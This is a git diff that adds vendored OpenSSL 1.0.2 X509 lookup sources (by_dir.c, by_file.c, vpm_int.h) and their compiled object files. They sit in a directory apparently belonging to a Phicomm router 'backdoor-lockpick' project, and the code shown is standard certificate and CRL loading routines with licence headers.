+        stmp.data.x509 = &data.x509.st_x509;
+        postfix = "";
+    } else if (type == X509_LU_CRL) {
+        data.crl.st_crl.crl = &data.crl.st_crl_info;
+        data.crl.st_crl_info.issuer = name;
+        stmp.data.crl = &data.crl.st_crl;
+        postfix = "r";
+    } else {
+        X509err(X509_F_GET_CERT_BY_SUBJECT, X509_R_WRONG_LOOKUP_TYPE);
+        goto finish;
+    }
+
+    if ((b = BUF_MEM_new()) == NULL) {
+        X509err(X509_F_GET_CERT_BY_SUBJECT, ERR_R_BUF_LIB);
+        goto finish;
+    }
+
+    ctx = (BY_DIR *)xl->method_data;
+
+    h = X509_NAME_hash(name);
+    for (i = 0; i < sk_BY_DIR_ENTRY_num(ctx->dirs); i++) {
+        BY_DIR_ENTRY *ent;
+        int idx;
+        BY_DIR_HASH htmp, *hent;
+        ent = sk_BY_DIR_ENTRY_value(ctx->dirs, i);
+        j = strlen(ent->dir) + 1 + 8 + 6 + 1 + 1;
+        if (!BUF_MEM_grow(b, j)) {
+            X509err(X509_F_GET_CERT_BY_SUBJECT, ERR_R_MALLOC_FAILURE);
+            goto finish;
+        }
+        if (type == X509_LU_CRL && ent->hashes) {
+            htmp.hash = h;
+            CRYPTO_r_lock(CRYPTO_LOCK_X509_STORE);
+            idx = sk_BY_DIR_HASH_find(ent->hashes, &htmp);
+            if (idx >= 0) {
+                hent = sk_BY_DIR_HASH_value(ent->hashes, idx);
+                k = hent->suffix;
+            } else {
+                hent = NULL;
+                k = 0;
+            }
+            CRYPTO_r_unlock(CRYPTO_LOCK_X509_STORE);
+        } else {
+            k = 0;
+            hent = NULL;
+        }
+        for (;;) {
+            char c = '/';
+#ifdef OPENSSL_SYS_VMS
+            c = ent->dir[strlen(ent->dir) - 1];
+            if (c != ':' && c != '>' && c != ']') {
+                /*
+                 * If no separator is present, we assume the directory
+                 * specifier is a logical name, and add a colon.  We really
+                 * should use better VMS routines for merging things like
+                 * this, but this will do for now... -- Richard Levitte
+                 */
+                c = ':';
+            } else {
+                c = '\0';
+            }
+#endif
+            if (c == '\0') {
+                /*
+                 * This is special.  When c == '\0', no directory separator
+                 * should be added.
+                 */
+                BIO_snprintf(b->data, b->max,
+                             "%s%08lx.%s%d", ent->dir, h, postfix, k);
+            } else {
+                BIO_snprintf(b->data, b->max,
+                             "%s%c%08lx.%s%d", ent->dir, c, h, postfix, k);
+            }
+#ifndef OPENSSL_NO_POSIX_IO
+# ifdef _WIN32
+#  define stat _stat
+# endif
+            {
+                struct stat st;
+                if (stat(b->data, &st) < 0)
+                    break;
+            }
+#endif
+            /* found one. */
+            if (type == X509_LU_X509) {
+                if ((X509_load_cert_file(xl, b->data, ent->dir_type)) == 0)
+                    break;
+            } else if (type == X509_LU_CRL) {
+                if ((X509_load_crl_file(xl, b->data, ent->dir_type)) == 0)
+                    break;
+            }
+            /* else case will caught higher up */
+            k++;
+        }
+
+        /*
+         * we have added it to the cache so now pull it out again
+         */
+        CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+        j = sk_X509_OBJECT_find(xl->store_ctx->objs, &stmp);
+        if (j != -1)
+            tmp = sk_X509_OBJECT_value(xl->store_ctx->objs, j);
+        else
+            tmp = NULL;
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+
+        /* If a CRL, update the last file suffix added for this */
+
+        if (type == X509_LU_CRL) {
+            CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+            /*
+             * Look for entry again in case another thread added an entry
+             * first.
+             */
+            if (!hent) {
+                htmp.hash = h;
+                idx = sk_BY_DIR_HASH_find(ent->hashes, &htmp);
+                if (idx >= 0)
+                    hent = sk_BY_DIR_HASH_value(ent->hashes, idx);
+            }
+            if (!hent) {
+                hent = OPENSSL_malloc(sizeof(BY_DIR_HASH));
+                hent->hash = h;
+                hent->suffix = k;
+                if (!sk_BY_DIR_HASH_push(ent->hashes, hent)) {
+                    CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+                    OPENSSL_free(hent);
+                    ok = 0;
+                    goto finish;
+                }
+            } else if (hent->suffix < k)
+                hent->suffix = k;
+
+            CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+
+        }
+
+        if (tmp != NULL) {
+            ok = 1;
+            ret->type = tmp->type;
+            memcpy(&ret->data, &tmp->data, sizeof(ret->data));
+            /*
+             * If we were going to up the reference count, we would need to
+             * do it on a perl 'type' basis
+             */
+        /*- CRYPTO_add(&tmp->data.x509->references,1,
+                    CRYPTO_LOCK_X509);*/
+            goto finish;
+        }
+    }
+ finish:
+    if (b != NULL)
+        BUF_MEM_free(b);
+    return (ok);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_dir.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_dir.o
new file mode 100644
index 0000000000000000000000000000000000000000..ba879d08bdd96d2793fe23ab84ab1168a5ed719f
GIT binary patch
literal 7480
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
AS^xk5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_file.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_file.c
new file mode 100644
index 0000000..43a0730
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_file.c
@@ -0,0 +1,277 @@
+/* crypto/x509/by_file.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include <errno.h>
+
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/buffer.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+#ifndef OPENSSL_NO_STDIO
+
+static int by_file_ctrl(X509_LOOKUP *ctx, int cmd, const char *argc,
+                        long argl, char **ret);
+X509_LOOKUP_METHOD x509_file_lookup = {
+    "Load file into cache",
+    NULL,                       /* new */
+    NULL,                       /* free */
+    NULL,                       /* init */
+    NULL,                       /* shutdown */
+    by_file_ctrl,               /* ctrl */
+    NULL,                       /* get_by_subject */
+    NULL,                       /* get_by_issuer_serial */
+    NULL,                       /* get_by_fingerprint */
+    NULL,                       /* get_by_alias */
+};
+
+X509_LOOKUP_METHOD *X509_LOOKUP_file(void)
+{
+    return (&x509_file_lookup);
+}
+
+static int by_file_ctrl(X509_LOOKUP *ctx, int cmd, const char *argp,
+                        long argl, char **ret)
+{
+    int ok = 0;
+    char *file;
+
+    switch (cmd) {
+    case X509_L_FILE_LOAD:
+        if (argl == X509_FILETYPE_DEFAULT) {
+            file = (char *)getenv(X509_get_default_cert_file_env());
+            if (file)
+                ok = (X509_load_cert_crl_file(ctx, file,
+                                              X509_FILETYPE_PEM) != 0);
+
+            else
+                ok = (X509_load_cert_crl_file
+                      (ctx, X509_get_default_cert_file(),
+                       X509_FILETYPE_PEM) != 0);
+
+            if (!ok) {
+                X509err(X509_F_BY_FILE_CTRL, X509_R_LOADING_DEFAULTS);
+            }
+        } else {
+            if (argl == X509_FILETYPE_PEM)
+                ok = (X509_load_cert_crl_file(ctx, argp,
+                                              X509_FILETYPE_PEM) != 0);
+            else
+                ok = (X509_load_cert_file(ctx, argp, (int)argl) != 0);
+        }
+        break;
+    }
+    return (ok);
+}
+
+int X509_load_cert_file(X509_LOOKUP *ctx, const char *file, int type)
+{
+    int ret = 0;
+    BIO *in = NULL;
+    int i, count = 0;
+    X509 *x = NULL;
+
+    if (file == NULL)
+        return (1);
+    in = BIO_new(BIO_s_file_internal());
+
+    if ((in == NULL) || (BIO_read_filename(in, file) <= 0)) {
+        X509err(X509_F_X509_LOAD_CERT_FILE, ERR_R_SYS_LIB);
+        goto err;
+    }
+
+    if (type == X509_FILETYPE_PEM) {
+        for (;;) {
+            x = PEM_read_bio_X509_AUX(in, NULL, NULL, NULL);
+            if (x == NULL) {
+                if ((ERR_GET_REASON(ERR_peek_last_error()) ==
+                     PEM_R_NO_START_LINE) && (count > 0)) {
+                    ERR_clear_error();
+                    break;
+                } else {
+                    X509err(X509_F_X509_LOAD_CERT_FILE, ERR_R_PEM_LIB);
+                    goto err;
+                }
+            }
+            i = X509_STORE_add_cert(ctx->store_ctx, x);
+            if (!i)
+                goto err;
+            count++;
+            X509_free(x);
+            x = NULL;
+        }
+        ret = count;
+    } else if (type == X509_FILETYPE_ASN1) {
+        x = d2i_X509_bio(in, NULL);
+        if (x == NULL) {
+            X509err(X509_F_X509_LOAD_CERT_FILE, ERR_R_ASN1_LIB);
+            goto err;
+        }
+        i = X509_STORE_add_cert(ctx->store_ctx, x);
+        if (!i)
+            goto err;
+        ret = i;
+    } else {
+        X509err(X509_F_X509_LOAD_CERT_FILE, X509_R_BAD_X509_FILETYPE);
+        goto err;
+    }
+ err:
+    if (x != NULL)
+        X509_free(x);
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+
+int X509_load_crl_file(X509_LOOKUP *ctx, const char *file, int type)
+{
+    int ret = 0;
+    BIO *in = NULL;
+    int i, count = 0;
+    X509_CRL *x = NULL;
+
+    if (file == NULL)
+        return (1);
+    in = BIO_new(BIO_s_file_internal());
+
+    if ((in == NULL) || (BIO_read_filename(in, file) <= 0)) {
+        X509err(X509_F_X509_LOAD_CRL_FILE, ERR_R_SYS_LIB);
+        goto err;
+    }
+
+    if (type == X509_FILETYPE_PEM) {
+        for (;;) {
+            x = PEM_read_bio_X509_CRL(in, NULL, NULL, NULL);
+            if (x == NULL) {
+                if ((ERR_GET_REASON(ERR_peek_last_error()) ==
+                     PEM_R_NO_START_LINE) && (count > 0)) {
+                    ERR_clear_error();
+                    break;
+                } else {
+                    X509err(X509_F_X509_LOAD_CRL_FILE, ERR_R_PEM_LIB);
+                    goto err;
+                }
+            }
+            i = X509_STORE_add_crl(ctx->store_ctx, x);
+            if (!i)
+                goto err;
+            count++;
+            X509_CRL_free(x);
+            x = NULL;
+        }
+        ret = count;
+    } else if (type == X509_FILETYPE_ASN1) {
+        x = d2i_X509_CRL_bio(in, NULL);
+        if (x == NULL) {
+            X509err(X509_F_X509_LOAD_CRL_FILE, ERR_R_ASN1_LIB);
+            goto err;
+        }
+        i = X509_STORE_add_crl(ctx->store_ctx, x);
+        if (!i)
+            goto err;
+        ret = i;
+    } else {
+        X509err(X509_F_X509_LOAD_CRL_FILE, X509_R_BAD_X509_FILETYPE);
+        goto err;
+    }
+ err:
+    if (x != NULL)
+        X509_CRL_free(x);
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+
+int X509_load_cert_crl_file(X509_LOOKUP *ctx, const char *file, int type)
+{
+    STACK_OF(X509_INFO) *inf;
+    X509_INFO *itmp;
+    BIO *in;
+    int i, count = 0;
+    if (type != X509_FILETYPE_PEM)
+        return X509_load_cert_file(ctx, file, type);
+    in = BIO_new_file(file, "r");
+    if (!in) {
+        X509err(X509_F_X509_LOAD_CERT_CRL_FILE, ERR_R_SYS_LIB);
+        return 0;
+    }
+    inf = PEM_X509_INFO_read_bio(in, NULL, NULL, NULL);
+    BIO_free(in);
+    if (!inf) {
+        X509err(X509_F_X509_LOAD_CERT_CRL_FILE, ERR_R_PEM_LIB);
+        return 0;
+    }
+    for (i = 0; i < sk_X509_INFO_num(inf); i++) {
+        itmp = sk_X509_INFO_value(inf, i);
+        if (itmp->x509) {
+            X509_STORE_add_cert(ctx->store_ctx, itmp->x509);
+            count++;
+        }
+        if (itmp->crl) {
+            X509_STORE_add_crl(ctx->store_ctx, itmp->crl);
+            count++;
+        }
+    }
+    sk_X509_INFO_pop_free(inf, X509_INFO_free);
+    return count;
+}
+
+#endif                          /* OPENSSL_NO_STDIO */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_file.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_file.o
new file mode 100644
index 0000000000000000000000000000000000000000..5debc5a16878a4dd945e97cd75e4811b65835987
GIT binary patch
literal 5648
zcmb`KU2Ggz702&-oyN58+AS>@0%1!(;-+NT4U{AZA&--_cVUx_Y%hd<WV&8YKIHZ8
zYCIDXC~d)U)WJ>FhtfAt5ieCiJW%zegw#^fK;fZPfFgthm0F2f+lo}607;|e{O`y5
zcy=d(iX+Y3JHI*i+<VTsckZ2svxTvqSWFm+i7$%PCqso8ym7TYBC8`}Pz(s`D^@8V
zT*(Fh%$>X&+?py)zJ*FYIGbBs_WQG$<;=@3^bl!o$-JC7pShR|eknBy!Cy0f%4Xio
z1ux0x+~Pa_q*DI?sh>Vhw->LYn|#}x4E~%8{-!jS()r+AZt<empI`dckkvXXaenDY
zUk7ZRF|Br-dGJ(jNsiK>dv^t|-*4S#-EZwb^Y?*`mvSf9QGY_#;hHsNokBQDlVo?`
z_!g??g3I~fV(@!45ba7ncnQvKUUl|#otnwflZR4w_u@MP$D2e~UZGndc=v@km8Yw8
zGZ7&h51m@L67wIRMk-hZ<Fe{ulQeaEYe0yFe^n{Ei*I`CC2Kyo8oK8G+|oCPa=|(I
z#tP0YE_(;bXA`LAj~1@<_@B;P3|ZI7x}JvA+z>L+yhGWa!Js>wGlrViQ#aY*A8JS|
z;rLop<XFktYXujq*021dx!|=NX3wv43;&M$dt|G2Fp%M8zfZ$+FifHR?v+++aoHO9
z-dXb9|C}1sAq>i)8=Eg1$Y#u6|JK*2L35q7LhV&kO8Y&O_ozIl{)ap_Os^Om)rHLS
z+f-Tk3*D}s=L$9In&-{ZR6EZD$n&+5tpsG1rP>PRiBfIzR6mVWTOFz1s7xT$r#oC|
z4u_03^~^x>o3F4Go4kh;y>Kb!ty_8iy;f`GkC$65R}|{yndE`PRVR74=GBvxa^(>6
z^?#S~ojX6D94<}!HP27(NPQ-i-jdno%g4+^ThpoZXYW*4_1sIvAYEAY<9kYizEjI!
zSelTVR3T#Dm=Lj}gRu?$>-(Od*|DAY$Mn13pd3vMKHf8$7&;j*CX$c!T8ZHk>#Rh2
z;hLTwCx&+=lJtsHMiYIizkRxGzb;`9UjoP!zBprTd!w*7-nJLt77H1?jntn(Ly{+P
zqqdLr>`Dxsh*R61<B1_l_KZGW#e0&{)%(~U?gMe?M;nq4s^Y45sP>9?Tiul6U3VD7
z+(dnCt2kNeCUKdywQsOp^f3D}H^eq;eit?(5*a5|rCzVmwY5cDU>oX`xVW|x5{V1+
zzE-x$N4cr2eL+ugL6adQU!Z5q$FNKg=*H~`ek6iF9KlaU@TVg9vl09k5&Ucf|7`@v
zr}IY2qsgCHCl`p{!1A@1o*_8GK>rWwQLQ1W-%Pw)+>#M|ID%&)_;>`rH-gVba6f{7
zCxZVlf<F_%&k#p^Uexnnu78TpYZ3ZyNAOD#{5rA=`#0&O+WtmNAG7h*PgTUeyVE=D
zDs2OH#c@5m;#Sq0M%ndJX`vPEisx2Es<1OH?D0Zz)GFA;v9ZbQls#pQ7P7V&%@^&O
z^L5!)?9J}BrQQ6Vv7+rdWPJK?UFsZg9Y<s*ChUgq*^cYhT`@mvA1POTM-63isyLCg
z%QI>`9gIdn`Za$}y^$SAn?xJ+hAr!|??SQo<<ed?prddS4wI+#S-%nX8n5K==9Rwo
zMk47sJTiVL*R0Y$<%i?U+ST&B@dmzCs!rL}-pR4ZQO#^UtePSg5+8Itd&W6X_Nx?l
zL|+cksT~pY21T?M_dusihJEcIcTN<PB2`pq+JgXT52Q2yYQf?h0>SjeTBn19ln()t
zU|P|cx6QGaLBO%TjeZW01pEfN3_k!!0*+r9!(BiUaLif5ama#zWA8Kk2Y@8tH`8Uf
z*?++?X2YMOIt2UAhv_o>=YS;8AEL|f^ME9X!$;{d{4yX3^l|PmJWlHo0{(Hj4Bx~!
z_xDSTZ)Exo<DX#MWjx9F3C3?>{AtE{+<wORCz(FJOAw6zR=Uji-(Z~E=|x~jpwIp4
zXPoE#BaHKYi;Uk!woJcYW&C!=XBfYO@uwK)<9U|x4NU(H#(5r_jPpDW=p#|s->r=E
zJnm+EnDu)P<4MMAjNiie661WHf1mL?nf^~1$6Pn@JkL0f&+CkH`|mN%?e`)8Bq(@(
zC8Qgs3r<-&i~_zxz`@M9FG+O>n9;@aeYlYrZq6MIh1=YmFMbl@#{Ta@-0Zi5dOjQb
zW}g(P`D1fld74VkRplX5bDe5A<vB+^k(w!cWs#bmpBE{&jt8h`QW<)Lk|b11RqK^9
z?VgqT+?-RRcD1_ar0Bn9%e+^v%<AWZH9ysG>kZlmj%fqVA^K>S=Nvuy_g^HbDO?So
zs7HuFHt9U7C#7rZD6v+cGC~)ZNA&@4yKayD0{!%9C4566SexK_8UaZ;80yz>ofh*b
zK1DUye8258)D||k(#6H}k3E2k>ED!DdWm|t|3~!r&3V_@NScZ+N2u%;zh!+0PHR2H
z4>=0QuS5*}8$GH@c~$p+mjSvo<2L1f;-=13FaMYEuTi7*bn&$*?O<_}B;|eeX2x&G
z396v~aQmcb9~xY^{kN%YxA<Mq@q0pdg!tia&$Ku5uUp?}GNKnmQpX`d3|F{4{y4+A
gCnO%wznr&*91FQ4zm476KZ1`Yi5b6o>de)D0M`OybN~PV

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/vpm_int.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/vpm_int.h
new file mode 100644
index 0000000..9c55def
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/vpm_int.h
@@ -0,0 +1,70 @@
+/* vpm_int.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2013.
+ */
+/* ====================================================================
+ * Copyright (c) 2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
